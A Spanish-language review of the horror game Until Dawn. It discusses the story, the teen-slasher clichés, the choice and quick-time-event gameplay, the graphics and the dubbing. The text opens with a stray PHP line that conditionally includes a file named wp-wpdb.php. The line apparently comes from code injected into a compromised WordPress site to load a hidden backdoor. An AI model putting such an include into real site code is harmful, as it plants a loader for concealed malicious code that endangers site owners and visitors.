if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Until Dawn – La Fortaleza de LeChuck

Análisis Until Dawn

Hubo un tiempo en el que la industria cinematográfica producía películas del tipo slasher a cascoporro con una gran variedad de asesinos ataviados con disfraces curiosos y adolescentes inocentones. Sony ha querido llevar esa época dorada a los videojuegos con Until Dawn, donde viviremos una aventura terrorífica en las montañas nevadas de Blackwood Pines con psicópatas, monstruos y adolescentes en plena revolución hormonal. ¿Conseguirán sobrevivir hasta el amanecer?

untildawn

Las cintas de terror de adolescentes y psicópatas tuvieron muy buena acogida en el pasado con títulos como Viernes 13Pesadilla en Elm Street o Scream, y sus villanos se han convertido en verdaderos iconos de la cultura pop. Recuperando un poco la esencia de estos filmes, Until Dawn nos pone en la piel de 8 adolescentes que están de fiesta en el refugio de los padres de tres de ellos, todo va bien entre alcohol y risas pero la cosa se tuerce cuando después de una broma pesada una de las chicas huye de la casa corriendo. Su hermana va tras ella y ambas desaparecen en la oscura noche. Un año después siguen desaparecidas y el grupo de amigos regresa a la casa para recordarlas pero de repente comienzan a sufrir sucesos inexplicables y notan la presencia de alguien que les acecha desde las sombras.

until-dawn-1
Más de uno merecerá morir, os lo aseguro.

Como buena cinta de serie B, el plantel de personajes de Until Dawn está lleno de estereotipos y la historia bebe de clichés del género con diálogos bastante pobres que giran en torno al ligoteo, celos y rivalidad. Precisamente los dos primeros episodios son puramente drama adolescente, sin apenas intervención del asesino y de susto fácil. Veremos como por parejas discuten, ligan, buscan un rinconcito íntimo, y se gastan bromas. La relación de amistad y personalidad de cada chico variará a lo largo del juego según nuestras decisiones: insultar o poner paz, estar del lado de él o de ella, y así un sinfín de dilemas que marcarán la relación de los personajes y provocarán que en un momento dado nos ayuden o traicionen. En el menú podremos consultar el gráfico que muestra a lo «sim» cómo han variado nuestros atributos y la relación con nuestros amigos.

Until Dawn no solo trata de locos persiguiendo jóvenes, ya que no estamos ante una película de hora y media, por lo tanto, para darle más chicha al juego se ha dividido en tres grandes arcos argumentales: las gemelas, los sucesos de 1952 y el hombre misterioso. Sobre nosotros recaerá la misión de recabar pistas explorando el escenario para unir las piezas de cada rompecabezas. A medida que demos con más pistas, se actualizará las anteriores con una resolución y los personajes mantendrán diálogos alrededor de las pruebas.

until-dawn-2
¿Alguien ha llamado al fontanero?

La jugabilidad de Until Dawn podría resumirse en cinemáticas, Quick Time Events y decisiones. Además, es uno de esos títulos que abre el eterno debate sobre qué es un videojuego. Ciertamente se asemeja a otros juegos como Heavy Rain y formaría parte del grupo de «película interactiva» donde el jugador es un mero espectador de sus decisiones y le hacen sentirse como el director de la película. El título está planteado como una miniserie donde cada vez que comenzamos un nuevo episodio veremos un resumen del anterior. En cada capítulo tomaremos el control de varios adolescentes que vivirán situaciones límite, y mediante las decisiones de escasos segundos que se muestran en pantalla, y nuestra habilidad con los Quick Time Events que les siguen, marcaremos el destino del individuo, es decir, en nuestras manos está que viva o muera. En relación a esto, Until Dawn trata el efecto mariposa: “el batir de las alas de una mariposa puede provocar un huracán en otra parte del mundo.” Esta idea sacada de teoría del caos indica que las cosas que hagamos influirán en hechos futuros, es decir, el causa-efecto que experimentaremos y se recogerá en el menú durante el desarrollo de los hechos. No obstante, por los escenarios habrán objetos coleccionables escondidos que nos ofrecerán imágenes a modo de flashforwards para evitar posibles desgracias futuras.

until-dawn-3
¡Bah! Si esos no te hacen falta

Entremos a hablar de gráficos. Until Dawn tiene junto con The Order: 1886 los mejores gráficos que he visto hasta la fecha en PS4. Las texturas son de alta calidad, los movimientos están muy logrados y las expresiones faciales son extremadamente realistas, es aquí donde se aprecia el gran trabajo de captura de movimiento con actores reales. Los efectos de iluminación son impresionantes y favorecen a la atmósfera de misterio. Las cámara fijas se han dispuesto para aumentar la tensión sin resultar una molestia y evitan ese difícil control que se daba en los juegos de antaño. El sonido cuenta con una banda sonora cinematográfica que te pone en alerta y favorece los momentos más intensos. En cuanto a los actores de voz, he jugado con el juego doblado y he quedado satisfecha en general, los dobladores representaban correctamente sus papeles. Os recomiendo echar un vistazo a los videos del making of que se irán desbloqueando para comprobar el interesante proceso de desarrollo del juego.

until-dawn-4
Aquí es donde tenían un jacuzzi, ¿no?

Until Dawn me ha resultado un juego bastante entretenido pero en ocasiones un tanto repetitivo al regresar una vez tras otra a las mismas localizaciones y dando largas caminatas sin disponer de la opción de correr. Personalmente no he tenido muchos sustos o temor y tampoco me ha resultado la atmósfera tan opresiva como pensaba, sin embargo, he disfrutado del aura de misterio de algunos lugares como el manicomio o el sótano del refugio. También me ha gustado recabar pistas de la trama por los oscuros pasillos, aunque, de las tres líneas argumentales, dos de ellas pueden defraudar al descubrir la verdad y ver como el juego toma otro camino distinto al que estaba planteado. Por último, se echa de menos unos personajes mejor trabajados, ya que salvo Mike y Sam los demás importarán bastante poco que les partan el cuello.

En definitiva, Until Dawn es un juego para amantes del género slasher y survival horror donde su realismo gráfico y las decisiones que tomes harán que te sientas el director de tu propia película.